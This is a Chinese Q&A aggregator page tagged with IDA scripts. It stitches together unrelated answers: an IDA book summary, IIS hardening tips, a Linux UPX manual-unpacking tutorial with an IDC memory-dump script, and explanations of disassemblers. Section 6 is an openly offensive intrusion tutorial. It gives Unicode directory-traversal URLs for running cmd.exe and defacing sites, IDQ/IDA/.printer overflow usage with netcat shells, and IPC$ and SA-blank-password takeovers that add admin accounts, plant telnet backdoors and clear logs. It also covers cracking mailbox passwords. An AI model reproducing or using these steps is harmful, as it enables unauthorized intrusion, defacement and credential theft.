當前位置:首頁 » 編程軟體 » idaidc腳本

idaidc腳本

發布時間: 2023-09-25 09:15:13

⑴ IDA Pro權威指南的內容簡介

《IDA Pro權威指南》內容簡介:IDA Pro(互動式反匯編器專業版)是應用最廣泛的靜態反匯編工具,在IT領域有著舉足輕重的地位,但其文檔資料一直都不夠完善。在IDA Pr0創建者Ilfak的協助下問世的這《IDA Pro權威指南》,完美地彌補了這一缺憾。C卜¨1s的理論被業界公認為是權威且令人信服的。而他的模擬器也是公開發布的IDA插件中最棒的一款。
《IDA Pro權威指南》首先描述反匯編理論、逆向工程的基本信息}111DA Pro的背景知識,然後系統地介紹IDA的基本布局和功能、復雜數據結構的處理、交叉引用與繪圖功能,以及如何在非Wiridows平台上運行IDA。書中由淺入深地介紹了IDA的配置、F LlRT技術、IDA類型庫的擴展以及一些IDA限制。難得的是。《IDA Pro權威指南》還探討了IDA的可擴展性。涉及IDA腳本、SDK、插件、載入器模塊和處理器模塊。最後闡述了IDA在逆向工程中的實際用法,討論了各種編譯器的區別、模糊代碼分析和漏洞分析、IDA插件以及IDA調試器。

⑵ 伺服器安全設置如何設置伺服器安全

用NT(2000)建立的WEB站點在所有的網站中佔了很大一部分比例,主要因為其易用性與易管理性,使該公司不必再投入大量的金錢在伺服器的管理上,這一點優於nix系統,不必請很專業的管理員,不必支付一份可以節省的高薪,呵呵,當然nix的管理員也不會失業,因為其開放源碼和windows系統無與倫比的速度,使得現在幾乎所有的大型伺服器全部採用nix系統。但對於中小型企業來說windows已經足夠,但NT的安全問題也一直比較突出,使得一些每個基於NT的網站都有一種如履薄冰的感覺,在此我給出一份安全解決方案,算是為中國的網路安全事業做出一份貢獻吧 (說明:本方案主要是針對建立Web站點的NT、2000伺服器安全,對於區域網內的伺服器並不合適。)
安全配置NT/2000 SERVER
即使正確的安裝了WIN2000 SERVER,系統還是有很多的漏洞,還需要進一步進行細致地配置。

1.埠:
埠是計算機和外部網路相連的邏輯介面,也是計算機的第一道屏障,埠配置正確與否直接影響到主機的安全,一般來說,僅打開你需要使用的埠會比較安全,配置的方法是在網卡屬性-TCP/IP-高級-選項-TCP/IP篩選中啟用TCP/IP篩選,不過對於win2000的埠過濾來說,有一個不好的特性:只能規定開哪些埠,不能規定關閉哪些埠,這樣對於需要開大量埠的用戶就比較痛苦。

2.IIS:
IIS是微軟的組件中漏洞最多的一個,平均兩三個月就要出一個漏洞,而微軟的IIS默認安裝又實在不敢恭維,所以IIS的配置是我們的重點,現在大家跟著我一起來:首先,把C盤那個什麼Inetpub目錄徹底刪掉,在D盤建一個Inetpub(要是你不放心用默認目錄名也可以改一個名字,但是自己要記得)在IIS管理器中將主目錄指向D:\Inetpub;其次,那個IIS安裝時默認的什麼scripts等虛擬目錄一概刪除,如果你需要什麼許可權的目錄可以自己慢慢建,需要什麼許可權開什麼。(特別注意寫許可權和執行程序的許可權,沒有絕對的必要千萬不要給)第三,應用程序配置:在IIS管理器中刪除必須之外的任何無用映射,必須指的是ASP,ASA和其他你確實需要用到的文件類型,例如你用到stml等(使用server side include),實際上90%的主機有了上面兩個映射就夠了,其餘的映射幾乎每個都有一個凄慘的故事:htw, htr, idq, ida……想知道這些故事?去查以前的漏洞列表吧。在IIS管理器中右擊主機->屬性->WWW服務 編輯->主目錄配置->應用程序映射,然後就開始一個個刪吧(裡面沒有全選的,嘿嘿)。接著在剛剛那個窗口的應用程序調試書簽內將腳本錯誤消息改為發送文本(除非你想ASP出錯的時候用戶知道你的程序/網路/資料庫結構)錯誤文本寫什麼?隨便你喜歡,自己看著辦。點擊確定退出時別忘了讓虛擬站點繼承你設定的屬性。安裝新的Service Pack後,IIS的應用程序映射應重新設置。(說明:安裝新的Service Pack後,某些應用程序映射又會出現,導致出現安全漏洞。這是管理員較易忽視的一點。)

⑶ IDC腳本怎麼獲取IDA所使用的動態鏈接庫的文件名

在system32中找到dwmapi.dll;應該是這個,你試試不行再說。

linux里文件如何進行文件脫殼

linux很少有需要crack的軟體,所以最近總是自娛自樂。自己寫的軟體自己破著玩但是由於都是知道自己的手段,沒有什麼意思。真的希望有高手們寫些crackme for linux 。
最近看了看windows的脫殼大致的理解了脫殼的原理,之前沒有怎麼接觸脫殼,通常只是選擇沒有殼的軟體看看。在linux下的殼沒有找到幾個。只找到了一個upx的殼,在windows下是個弱殼。實際上在linux下面也是弱殼,完全可以使用"upx -d"的命令解決問題。但我總是喜歡自己手動的。呵呵....純屬於自娛自樂。
ok,開始我們的linux的upx的脫殼之旅.........
我在選擇工具的時候花了很多時間,忽然發現GDB在upx面前是那麼的蒼白無力...也終於知道為什麼有人說GDB不適合做逆向了...雖然軟體在調試器里可以正常於運行,正常下斷。但是根本無法查看反匯編的代碼.......。
無奈無奈....使用傳說中最好的工具 IDA 為此我特地簡單的學習了一下IDC腳本的使用方法...
沒有什麼資料可以參考,是一件很不愉快的事情,因為不知道能不能成功。不管了,一步一步來吧...
我用「upx -d「 脫出了原來的文件,發現文件是全的,沒有任何部分丟失,所以我相信這些文件會出現在進程空間的某個時間的某個角落,這個很大的堅定了我手動脫殼的信心(但是實際上到這篇文章的結尾我也沒有能夠在找到完整的程序文件,但我相信理論上內存空間中應該會出現完整的文件的...)。
我的加殼軟體是我上次文章中用到做外掛的mines(掃雷游戲)。先找到了upx-3.03-i386_linux 軟體 附件中我會給出的免的度這篇文章的人去尋找了。
對我們目標軟體加殼,命令如下,的確是個好用的壓縮殼軟體,直接有54%的壓縮律。
代碼:
[jun@beijihuCom mpupx]$Content$nbsp;./upx mines
Ultimate Packer for eXecutables
Copyright (C) 1996 - 2008
UPX 3.03 Markus Oberhumer, Laszlo Molnar & John Reiser Apr 27th 2008
File size Ratio Format Name
-------------------- ------ ----------- -----------
13960 -> 7556 54.13% linux/elf386 mines
Packed 1 file.
[jun@beijihuCom mpupx]$Content$nbsp;
好了,我們開始調試他了,加了殼以後,一般的調試軟體已經對他無能為力了...
實驗一下GDB 和 DDD 的效果...以及objmp
readelf還可以正常使用,(僅限於一部分功能.呵呵,不詳談了...)
代碼:
[jun@beijihuCom mpupx]$Content$nbsp;readelf -e ./mines
ELF Header:
Magic: 7f 45 4c 46 01 01 01 03 00 00 00 00 00 00 00 00
Class: ELF32
Data: 2』s complement, little endian
Version: ; 1 (current)
OS/ABI: UNIX - Linux
ABI Version: 0
Type: EXEC (Executable file)
Machine: Intel 80386
Version: 0x1
Entry point address: 0xc02598
Start of program headers: 52 (bytes into file)
Start of section headers: 0 (bytes into file)
Flags: 0x0
Size of this header: 52 (bytes)
Size of program headers: 32 (bytes)
Number of program headers: 2
Size of section headers: 40 (bytes)
Number of section headers: 0
Section header string table index: 0
There are no sections in this file.
Program Headers:
Type Offset VirtAddr PhysAddr FileSiz MemSiz Flg Align
LOAD 0x000000 0x00c01000 0x00c01000 0x01d60 0x01d60 R E 0x1000
LOAD 0x0002fc 0x0804b2fc 0x0804b2fc 0x00000 0x00000 RW 0x1000
上面的輸出,我們可以發現他的入口點是0xc02598 這個入口點已經和GCC編譯出來的程序大不一樣了。實際上重「upx -d「脫出來的效果來看,原來的入口點基本上是不會改變的,也就是說我們的手動脫殼的時候軟體的入口點,載入方式都是和未加殼的軟體是一樣的...這一點又為我們的脫殼成功,增加了砝碼..
繼續....gdb 調試一下
代碼:
(gdb) b *0xc02598
Breakpoint 1 at 0xc02598
(gdb) r
Starting program: /home/jun/Crack/mpupx/mines
warning: shared library handler failed to enable breakpoint
(no debugging symbols found)
Breakpoint 1, 0x00c02598 in ?? ()
(gdb) disassemble
No function contains program counter for selected frame.
(gdb)
gdb看不反匯編代碼,暈了都不知道下一步的操作是什麼....看來是沒有什麼用了
祭起傳說中的逆向利器IDA.學西習了一下,簡單操作,我開始了調試之旅.
代碼:
[jun@beijihuCom mpupx]$Content$nbsp;idal ./mines
等到載入完成,會停在入口處,呵呵在游標在call上直接按F4,程序運行,停到了入口出
單步運行...實際上我沒有什麼辦法,不知道有什麼下好的方法下斷點,可以使這個簡單方法調試...
這邊我是這么想的,upx是壓縮殼,當他把執行權交給原目標程序的時候,必定會有一個大的跳轉,好多新手在windows脫殼,都是以這個為oep的標準的。linux應該也不會例外的...
F8單步到0xc025c8 跳到 oxc025d1 在 0xc025d3 又會跳回來。顯然是個循環。不在循環里浪費時間了。我們向下找找,下面有個retn返回。游標移到上面F4。實際上沒有什麼把握。只是蒙的,結果很好,沒有飛走.F8單步到了這里
繼續單步,retn到一個地方
不詳細分析了往下看。翻阿翻,不會這么巧吧.看見了 jmp dword ptr [edi]跳轉,這不會是傳說中的大跳吧。
不管直接F4到這里...哈哈很成功。
單步一下,跳到了這里。
不懂代碼的具體含義,但是明顯不是程序的入口...為什麼?單步....繼續
看到這里我忽然頓悟,這里是在做ld連接,不能讓他運行了,很可能是為了我們目標程序的運行進行共享庫的連接..會修改我們內存中的映像文件。這樣我們mp出來的就不是原來的干凈程序,因為我們沒有修復工具,比起windows裡面的PE修復要麻煩多了.....所以趕緊mp出來...
用來mp映像的idc腳本
代碼:
#include <idc.idc>
#define PT_LOAD 1
#define PT_DYNAMIC 2
static main(void)
{
auto ImageBase,StartImg,EndImg;//基址 08048000
auto e_phoff;
auto e_phnum,p_offset;//paddr 0xc 地址,pmemsz ox14大小,p_offset 0x4
auto i,mpfile;
ImageBase=0x08048000;
StartImg=0x08048000;
EndImg=0x0;
Message("%8x\n",Dword(ImageBase));
if (Dword(ImageBase)==0x7f454c46 || Dword(ImageBase)==0x464c457f )
{
if(mpfile=fopen("./mpfile","w+"))
{
e_phoff=ImageBase+Word(ImageBase+0x1c);
e_phnum=Word(ImageBase+0x2c);
for(i=0;i<e_phnum;i++)
{
if (Dword(e_phoff)==PT_LOAD || Dword(e_phoff)==PT_DYNAMIC)
{ p_offset=Dword(e_phoff+0x4);
StartImg=Dword(e_phoff+0xc);
EndImg=Dword(e_phoff+0xc)+Dword(e_phoff+0x14);
mp(mpfile,StartImg,EndImg,p_offset);
Message("mp LOAD%d ok.\n",i);
}
e_phoff=e_phoff+0x20;
}
fseek(mpfile,0x30,0);
fputc(0x00,mpfile);
fputc(0x00,mpfile);
fputc(0x00,mpfile);
fputc(0x00,mpfile);
fclose(mpfile);
}else Message("mp err.");
}
}
static mp(mpfile,startimg,endimg,offset)
{auto i;
auto size;
size=endimg-startimg;
fseek(mpfile,offset,0);
for ( i=0; i < size; i=i+1 )
{
fputc(Byte(startimg+i),mpfile);
}
}
改變文件的屬性,讓他可以運行。
代碼:
[jun@beijihuCom mpupx]$Content$nbsp;su
口令:
[root@beijihuCom mpupx]# chmod 755 ./mpfile
[root@beijihuCom mpupx]# ./mpfile
程序運行的很好..
總結:第一次在linux下手動脫殼,看上去文章中寫的很輕松,實際上在之前做了很多工作。包括ELF的載入等等。還有我發現如果程序的節表頭程序也能很好的運行,什麼的..
另外,我之調試的時候,實際經過很多挫折...沒有足夠的經驗嘛...不過些文章,截圖的時候都很順利..呵呵.共勉........

⑸ ida 分析 32位程序 需要使用32位 ida嗎

DLL 屬於可執行文件中的一類,又稱為動態鏈接庫,不能直接用DEBUG載入,一般由應用程序因使用該庫中的函數,而由操作系統在應用程序載入的同時被載入入特定地址,這個地址一般是DLL在鏈接時指定的。當DLL被載入到運行空間,根據輸出函數表,可以得到各個函數的入口地址,然後用DEBUG在各個入口下斷點,調用該函數時DEBUG將跟蹤進入該函數,從而實現反匯編。
反匯編屬於逆向工程,逆向工程的主要手段有兩大類,其中一類是動態分析,另一類是靜態分析。
前面提到的方法屬於動態分析,由DEBUG實現反匯編,該方法不容易得到完整的代碼,一般只能形成一段一段獨立分散的代碼,同時由於DEBUG的局限性,反匯編的代碼質量多不高,生成的代碼不能直接使用,原因在於DLL在載入時若沒有載入到指定地址空間,操作系統將對代碼進行重定向,所以DEBUG只能得到重定向後的代碼,這類代碼必須修改每一個重定向點,才能形成可執行代碼。作為WINDOWS32位操作系統, OLLYDBG是最為優秀的調試、跟蹤、反匯編工具,多窗口運行,可以方便的通過窗口操作完成各類動作,而不需要像一般DEBUG那樣由命令行來完成,OLLYDBG還有許多一般調試器不具備的功能,同時由於每一代高手不斷的修改,使其具有多種功能,同時帶來的就是混亂,誰也不知道有多少版本,誰也不清楚每個版本到底增加了什麼功能,但就這樣,也是瑕不掩疵, OLLYDBG任然是DEBUG中最強大,最好使用的。
靜態分析和動態分析不同,靜態分析直接打開原程序,載入而不運行,然後直接分析載入的代碼。目前靜態分析工具,最強大的當屬IDA,IDA支持幾乎所有種類的匯編語言。
IDA載入應用程序有許多選項,可以選擇完整的載入整個程序,也可以選擇載入程序的某個塊,一般可選擇的是否載入文件頭、資源表、輸入表、輸出表等等。
IDA還支持調試,也就是說,當你在進行反匯編過程時,可以直接使用IDA來調試跟蹤,以分析代碼的動態執行情況,不過就動態跟蹤來說,OLLYDBG更為強大。
IDA反匯編的正確率和代碼的復雜程度有關,對於正規開發的代碼,尤其是如果能夠獲得源程序的調試文件,即所謂的PDB文件,IDA可以讀取PDB文件中的信息,使得反匯編的效率和准確度大為提高,生成的代碼甚至比源代碼易讀。IDA將反匯編生成的結果存入IDB文件中。當你確認反匯編的結果達到你的要求,可以讓IDA輸出匯編源代碼,IDA也提供其他格式的輸出,例如HTML文件,便於用戶閱讀。樓主主要是用於分析DLL文件,一般來說這類文件更適合做靜態分析,所以推薦使用IDA來進行。
IDA對於分析那些加殼或含有大量花指令、混淆代碼、垃圾代碼的程序,反匯編的正確率會大為下降,因為IDA無法正確的確認當期位置上的數值是屬於代碼,還是屬於數據,是普通C字元,還是DELPHI的字元串,還是UNICODE字元串,是結構數據還是數組還是類表(DELPHI生成的代碼中含有大量的類表)等等。遇到這種情況,就需要使用者掌握許多技巧,例如可以通過使用者對當前數據的認識,指導IDA如何處理當前的數據。對於大批量的,具有某些規律的數據,IDA還提供了腳本語言(文件尾位idc),通過對腳本的執行來指導IDA如何進行反匯編。對於更為復雜的情況,例如程序是自解壓運行的,這時IDA就沒有任何能力來進行正確的分析,通常都會用OLLYDBG動態跟蹤,等程序完成自解壓後從內存中將解壓後的代碼完整的挖下來形成文件,再由IDA進行靜態分析。
對於成功進行反匯編的代碼,IDA根據代碼的入口、調用、轉移等指令,可以為使用者提供各種格式的程序的流程圖,IDA提供許多格式由用戶選擇,便於用戶理解程序的結構。

匯編語言的科學定義,其實就是介於機器碼(各種01)和高級語言(如C)之間的一種語言。你用C語言寫一段程序,其實要在機器上運行的話,機器是不懂的,要經過編譯器、匯編器編譯,變成匯編,最終再變成機器碼,機器根據這些機器碼的01可以控制硬體電路完成你程序想執行的操作。

⑹ ROS無法使用telnet操作,winbox下想添加腳本scripts的添加按鈕灰色

由於網上很多朋友問我怎麼入侵別人的機器,所以整理了一些我認為容易學的漏洞入侵方法,希望能給初學者一些幫助,下面講的內容很簡單,高手就不用浪費時間看了,:)

(1) UNICODE漏洞入侵
「Uicode漏洞」是微軟IIS的一個重大漏洞。2001年最熱門漏洞之一。
第一步,運行RANGSCAN掃描器,會出現掃描窗口,在最上面有兩個from的橫框,這是讓你填一段IP范圍的。在第一個框里填入啟始域(打個比方,比如你要掃192.168.0.1至192.168.0.255)那麼你在第一個框里就填入192.168.0.1,在to 後面的框里填入192.168.0.255 意思就是掃192.168.0.0至192.168.0.255這段范圍里有UNICODE漏洞的機器。接著在中間有一個添加的橫框,是要填入內容的如:
/scripts/..%c0%af../winnt/system32/cmd.exe
這句話的意思是掃描有 %c0%af 漏洞的機器,對象一般是英文的WIN2000機。
我們把/scripts/..%c0%af../winnt/system32/cmd.exe填入框里,再按一下添加。再按「掃描」。就看到RANGSCAN開始掃了。這時就要看你選的IP范圍有漏洞的機器多不多了,如果你選的IP范圍好,呵,很快在掃描結果框里就會顯示掃到的漏洞主機
如192.168.0.111/scripts/..%c0%af../winnt/system32/cmd.exe
意思是192.168.0.111主機有 %c0%af 漏洞,
目標有了,我們馬上打開瀏覽器。在網址欄里輸入:
100.100.100.111/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ 回車
意思是查看機器里C盤的根目錄。一般情況下,我們都可以在瀏覽器里看到類似如:
Directory of c:\
2002-03-13 03:47p 289 default.asp
2002-02-11 03:47p 289 default.htm
2002-03-09 04:35p <DIR> Documents and Settings
2002-02-11 03:47p 289 index.asp
2002-02-11 03:47p 289 index.htm
2002-05-08 05:19a <DIR> Inetpub
2002-01-19 10:37p <DIR> MSSQL7
2002-03-09 04:22p <DIR> Program Files
2002-01-23 06:21p <DIR> WINNT
4 File(s) 1,156 bytes
5 Dir(s) 2,461,421,568 bytes free
------------------------------
的目錄列表。也會碰到看不到文件的空目錄。
好,我們成功看到了機器里的C盤了。
我們在瀏覽器里輸入:
192.168.0.111/scripts/..%c0%af../winnt/system32/cmd.exe?/c+set 回車
CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are:

ALLUSERSPROFILE=C:\Documents and Settings\All Users
CommonProgramFiles=C:\Program Files\Common Files
COMPUTERNAME=ON
ComSpec=C:\WINNT\system32\cmd.exe
CONTENT_LENGTH=0
GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
HTTP_ACCEPT_LANGUAGE=zh-cn
HTTP_CONNECTION=Keep-Alive
HTTP_HOST=192.168.0.111
HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98; Win 9x 4.90)
HTTP_ACCEPT_ENCODING=gzip, deflate
HTTPS=off
INSTANCE_ID=1
LOCAL_ADDR=192.168.0.111
NUMBER_OF_PROCESSORS=1
Os2LibPath=C:\WINNT\system32\os2\dll;
OS=Windows_NT
Path=C:\WINNT\system32;C:\WINNT;C:\WINNT\System32\Wbem;C:\MSSQL7\BINN
PATH_TRANSLATED=c:\inetpub\wwwroot
PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH
PROCESSOR_ARCHITECTURE=x86
PROCESSOR_IDENTIFIER=x86 Fa
-----------------
哈,我們看到了機器設置內容了,我們找找,主要看PATH_TRANSLATED=c:\inetpub\wwwroot
意思是他的主頁存放在c:\inetpub\wwwroot的目錄里,知道就好辦了。
我們用命令:
192.168.0.111/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\inetpub\wwwroot回車
我們就可以看到c:\inetpub\wwwroot目錄里的文件了,一般都有default.asp, default.htm , index.htm, index.asp,等等。我們以目錄里有index.asp做例子。
我們先要做的是把文件的只讀屬性解除掉,很多管理員都把文件設置只讀。
我們用命令:
192.168.0.111/scripts/..%c0%af../winnt/system32/attrib.exe?%20-r%20-h%20c:\inetpub\wwwroot\index.asp 回車
當看到下面的英文
CGI Error
The specified CGI application misbehaved by not returning a complete
set of HTTP headers. The headers it did return are:
恭喜你,你可以改他的網頁了。
----------------------------------------
但如果你看到下面的英文就不成功,只好換其他機器了。
CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are:
Access denied - C:\inetpub\wwwroot\index.asp
-----------------------------
繼續。現在用ECHO改網頁的內容。
100.100.100.111/scripts/..%c0%af../winnt/system32/cmd".exe?/c+echo+網站有漏洞+> c:\inetpub\wwwroot\index.asp 回車
當看到
CGI Error
The specified CGI application misbehaved by not returning a complete
set of HTTP headers. The headers it did return are:
的提示,你已經改了他的網頁了,呵呵,你想改成什麼字也行。只要把命令中的中文換成你自己的中文就行了。

英文WIN2000
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
中文WIN2000
/scripts/..%c0%2f../winnt/system32/cmd.exe
/scripts/..%c1%1c../winnt/system32/cmd.exe
WIN NT4
/scripts/..%c1%9c../winnt/system32/cmd.exe
英文WIN2000
/scripts/..%c0%af../winnt/system32/cmd.exe
通用代碼:/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\

(2) Windows2000輸入法漏洞
先用埠掃描器掃描開放3389的機器,然後用終端客戶端程序進行連接,用CTRL+SHIFT快速切換輸入法,切換至全拼,這時在登錄界面左下角將出現輸入法狀態條,在輸入法狀態條上按滑鼠右鍵。選擇「幫助」 —— 「輸入法指南」 —— 「選項」。(如果發現「幫助」呈灰色,放棄,因為對方很可能發現並已經補上了這個漏洞。)按右鍵,選擇「跳轉到URL」,輸入:c:\winnt\system32在該目錄下找到「net.exe」,為「net.exe」創建一個快捷方式,右鍵點擊該快捷方式,在「屬性」 —「目標」—c:\winnt\system32\net.exe 後面空一格,填入「user guest /active :yes」。 點擊「確定」(目的是,利用「net.exe」激活被禁止使用的guest賬戶)運行該快捷方式。(此時你不會看到運行狀態,但guest用戶已被激活。)然後重復操作上面的,在 「屬性」 —— 「目標」—— c:\winnt\system32\net.exe 後面空一格,填入localgroup administrators guest /add(這一步驟目的是,利用「net.exe」將guest變成系統管理員。)再次登錄終端伺服器,以「guest」身份進入,此時guest已是系統管理員,已具備一切可執行權及一切操作許可權。現在,我們可以像操作本地主機一樣,控制對方系統。
(3) idq溢出漏洞
要用到3個程序,一個Snake IIS IDQ 溢出程序GUI版本,一個掃描器,還有NC。
首先掃描一台有IDQ漏洞的機器,然後設置Snake IIS IDQ 溢出程序,在被攻擊IP地址後面寫上對方的IP.埠號一般不需要改動,軟體的默認綁定CMD.EXE的埠是813.不改了.用默認的,左面選擇操作系統類型,隨便選一個,我們選IIS5 English Win2k Sp0吧,點擊IDQ溢出~~OK~~出現發送Shellcode成功的提示了,然後我們用NC來連接。
進入MS-DOS。進入「nc」的目錄。然後:nc --v IP 813
c:\>nc -vv IP 813
IP: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [IP] 813 (?): connection refused
sent 0, rcvd 0: NOTSOCK
c:\>

看來沒成功. 別灰心,在來一次,換用IIS5 English Win2k Sp1試試。
c:\>nc -vv IP 813
IP: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [IP] 813 (?) open
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>
哈哈,終於上來啦,你現在可是system許可權,下面該怎麼做就看你的啦。

(4)IDA溢出漏洞
所用程序:idahack
進入MS-DOS方式(假設idq.exe在c:\下)
c:\idahack.exe
運行參數:c:\idahack <host> <hostport> <hosttype> <shellport>
chinese win2k : 1
chinese win2ksp1: 2
chinese win2ksp2: 3
english win2k : 4
english win2ksp1: 5
english win2ksp2: 6
japanese win2k : 7
japanese win2ksp1: 8
japanese win2ksp2: 9
korea win2k : 10
korea win2ksp1: 11
korea win2ksp2: 12
chinese nt sp5 : 13
chinese nt sp6 : 14

c:\idahack 127.0.0.1 80 1 80
connecting...
sending...
Now you can telnet to 80 port
好 luck 
好,現在你可以telnet它的80埠了,我們用NC來連接。
C:\nc 127.0.0.1 80

Microsoft Windows 2000 [Version 5.00.2195]
(C)版權所有 1985-1998 Microsoft Corp
C:\WINNT\system32>
OK,現在我們現在上來了,也可IDQ一樣是SYSTEN許可權,盡情的玩吧。

(5).printer漏洞
這個漏洞,我們用兩個程序來入侵。iis5hack和nc。
C:\>iis5hack
iis5 remote .printer overflow. writen by sunx
http://www.sunx.org
for test only, dont used to hack, :p

usage: D:\IIS5HACK.EXE <Host> <HostPort> <HostType> <ShellPort>
用法: D:\IIS5HACK <溢出的主機> <主機的埠> <主機的類型> <溢出的埠>
chinese edition: 0
chinese edition, sp1: 1
english edition: 2
english edition, sp1: 3
japanese edition: 4
japanese edition, sp1: 5
korea edition: 6
korea edition, sp1: 7
mexico edition: 8
mexico edition, sp1: 9

c:\>iis5hack 127.0.0.19 80 1 119
iis5 remote .printer overflow. writen by sunx
http://www.sunx.org
for test only, dont used to hack, :p
Listn: 80

connecting...
sending...
Now you can telnet to 3739 port
好 luck

溢出成功!
c:\>nc 127.0.0.19 119
http://www.sunx.org

Microsoft Windows 2000 [Version 5.00.2195]
(C) 版權所有 1985-2000 Microsoft Corp.

C:\WINNT\system32>

OK,我們又成功取得system許可權!玩吧。

(6)139埠入侵
我們先確定一台存在139埠漏洞的主機。用掃描工具掃描!比如SUPERSCAN這個埠掃描工具。假設現在我們已經得到一台存在139埠漏洞的主機,我們要使用nbtstat -a IP這個命令得到用戶的情況!現在我們要做的是與對方計算機進行共享資源的連接。
用到兩個NET命令,下面就是這兩個命令的使用方法
NET VIEW?
作 用:顯示域列表、計算機列表或指定計算機的共享資源列表。?
命令格式:net view [\\computername | /domain[:domainname]]?
參數介紹:?
<1>鍵入不帶參數的net view顯示當前域的計算機列表。?
<2>\\computername 指定要查看其共享資源的計算機。?
<3>/domain[:domainname]指定要查看其可用計算機的域?

NET USE?
作用:連接計算機或斷開計算機與共享資源的連接,或顯示計算機的連接信息。?
命令格式:net use [devicename | *] [\\computername\sharename[\volume]]?
[password | *]] [/user:[domainname\]username] [[/delete] |?
[/persistent:{yes | no}]]?
參數介紹:?
鍵入不帶參數的net use列出網路連接。?
devicename指定要連接到的資源名稱或要斷開的設備名稱。?
\\computername\sharename伺服器及共享資源的名稱。?
password訪問共享資源的密碼。?
*提示鍵入密碼。 /user指定進行連接的另外一個用戶。?
domainname指定另一個域。?
username指定登錄的用戶名。?
/home將用戶連接到其宿主目錄?
/delete取消指定網路連接。?
/persistent控制永久網路連接的使用。?
C:\net use \\IP
C:\net view \\IP
我們已經看到對方共享了他的C,D,E三個盤
我們要做的是使用NBTSTAT命令載入NBT快取.
c:\>nbtstat –R 載入NBT快取
c:\>nbtstat –c 看有無載入NBT快取
現在我們已經得到的139埠漏洞的主機IP地址和用戶名,現在就該是我們進入他計算的時候了,點擊開始---查找--計算機,將剛才找到的主機名字輸入到上面,選擇查找,就可以找到這台電腦了!雙擊就可以進入,其使用的方法和網上領居的一樣。

(7)IPC入侵
所有程序:流光
開始:在主界面選擇 探測→探測POP3/FTP/NT/SQL主機選項,或者直接按Ctrl+R。輸入我們要破解的IP段,我們把「將FrontPage主機自動加入HTTP主機列表取消了」。因為我們只想獲得IPC弱口令,這樣可以加快掃描的速度 :)填入IP,選擇掃描NT/98主機。在「輔助主機」那裡的「IPC$主機」前面打勾,然後在菜單了選「探測」,,掃描出結果以後,「IPC$主機」,選中後按「CTRL+F9」就開始探測IPC用戶列表。會出現「IPC自動探測」
的窗體,把那兩個選項都選了,然後點「選項」 為了加快弱口令掃描速度,這里的兩個選項我們可以全部取消記住。然後點「確定」出來後點「是」就開始探測了。一會兒,結果出來了。比如我們探測出了用戶名為「admin」的管理員,密碼為「admin」,現在我們用命令提示符,熟悉下命令吧,輸入:
net use file://對方ip/ipc$ "密碼" /user:"用戶名" || 建立遠程連接
icmd.exe file://對方ip/admin$ || admin$是對方的winnt目錄
net time file://對方IP/ || 看看對方的本地時間
at file://對方ip/ 啟動程序的時間 啟動程序名 啟動程序的參數 || 用at命令來定時啟動程序
telnet 對方ip 埠

我們也可以改網頁:
net use \\ip\ipc$ "admin" /uesr:"admin" 回車。
出現「命令成功完成」。
然後輸入「dir \\ip\c$\*.*」
看到C:下所有內容。現在我們來改主頁。一般主頁放在c:\inetpub\wwwroot裡面
輸入「dir \\ip\c$\inetpub\wwwroot\*.*」。就可以看到index.htm或index.asp或default.htm或 default.asp.這些就是主頁了,假如你黑頁在C:下,就輸入" 主頁文件 \\ip\c$\inetpub\wwwroot"覆蓋原文件這樣就行了,簡單吧?

日誌清除,斷開連接 :
我們 cl.exe ,clear.exe 上去,再執行,就可以清除日誌,比如clear all :清除所有的日誌。然後在斷開連接:net use file://ip/ipc$ /delete

(8)超管SA空密碼漏洞
使用的工具:流光IV
啟動流光,按Ctrl+R。出現掃描設置對話框,設置掃描IP段,並且選擇掃描的類型為SQL。點擊「確定」,進行掃描,假設我們取得主機:127.0.0.1,然後點擊「工具」 —— SQL遠程命令(或者Ctrl+Q),填入主機IP(127.0.0.1)、用戶(sa)、密碼(空)點擊「連接」,出現遠程命令行的界面。
net user heiying heiying1 /add 填加一個heiying的帳號和密碼heiying1
net localgroup administrators heiying /add 將我們創建的heiying帳號填加到管理組。
下面我們來做跳板:
打開cmd.exe,輸入net use \\127.0.0.1\ipc$ "heiying1" /user:"heiying"命令
顯示命令成功完成。
上傳srv.exe:
srv.exe \\127.0.0.1\admin$\system32
上傳ntlm.exe:
ntlm.exe \\127.0.0.1\admin$\system32
啟動服務:
首先用net time \\127.0.0.1
看看對方主機的時間,(假如回顯\\127.0.0.1 的本地時間是上午12.00),然後我們用at \\2127.0.0.1 12.01 srv.exe命令來啟動srv.exe。等一分鍾後就可以telnet了。
一分鍾後在本機命令提示符中輸入:
telnet X.X.X.X 99
然後我們要啟動NTLM.exe:
在telnet狀態下直接輸入ntlm回車。
顯示:windows 2000 telnet mp,by assassin,all rights reserved.done!
然後從新啟動對方主機的telnet服務:net stop telnet(先關閉telnet服務)再輸入net start telnet(啟動telnet服務)然後我們退出telnet,然後在命令行下輸入telnet 127.0.0.1,依照提示,接著輸入用戶名:heiying,密碼:heiying1,回車。這樣,我們的跳板就做好了,簡單吧?
(上面上傳的srv和ntlm等東東還有一個簡便方法,全都可以直接用流光工具菜單里的種植者上傳,60秒後自動運行,不用敲命令!呵呵~~~~方便吧!)

(9)如何用流光破解信箱密碼
這次的目標是21CN,運行流光IV,選擇POP3主機----右鍵----編輯----添加,填上:pop.21cn.com,其他的就用默認吧!不用更改,確定就行了。到下一步,還是右鍵-----從列表中添加------選擇一個字典,沒有的到網上下載一個字典,或者到黑白網路去下載,我們用簡單模式探測!這樣速度比較快,然後就等著成果吧,上次我以下就破了5個郵箱出來。

(10)frontpage進行攻擊
